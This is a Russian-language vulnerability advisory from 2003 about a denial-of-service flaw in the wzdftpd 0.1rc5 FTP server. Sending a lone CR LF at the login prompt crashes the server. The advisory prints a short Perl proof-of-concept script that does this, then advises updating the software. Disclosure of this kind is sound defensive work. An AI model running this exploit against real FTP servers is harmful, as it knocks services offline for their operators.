Дата публикации: | 25.09.2003 |
Всего просмотров: | 1696 |
Опасность: | Низкая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: wzdftpd 0.1rc5
Описание: Отказ в обслуживании обнаружен в wzdftpd FTP сервере. Удаленный атакующий может аварийно завершить работу FTP сервера. Удаленный пользователь может послать одиночную последовательность CR LF в login prompt, чтобы вызвать исключение и аварийно завершить работу FTP сервера. Пример/Эксплоит: #!/usr/bin/perl # #################################### # # Proof of concept for # # # WZDFTPD FTP Server version 0.1rc5 # # #################################### # http://www.moozatech.com/mt-23-09-2003.txt # Usage: perl mooza1.pl [host] [port] use IO::Socket; $host = $ARGV[0]; $port = $ARGV[1]; print "\n#####################################\n\n"; print "Proof-Of-Concept for wzdftpd v0.1rc5.\n"; print "this code is for demonstration only.\n"; print "Use it under your own responsebility.\n"; print "\n#####################################\n\n"; if (defined $host && defined $port ) { } else { print "Oops, Something is missing.\n"; die "Usage: perl mooza1.pl [host] [port]\n"; print "Connecting to $host:$port... "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type=> SOCK_STREAM) or die "Failed, Cant connect?\n"; print "OK\n"; sleep 1; print "Sending Dos..\n"; sleep 2; print $socket "\r\n"; $socket->autoflush(1); sleep 2; print "we are done here..\n\n"; close($socket); URL производителя: http://www.wzdftpd.net/ Решение: Установите обновленную версию программы с сайта производителя. |
|
Ссылки: | Moozatech: WZFTPD Denial Of Service |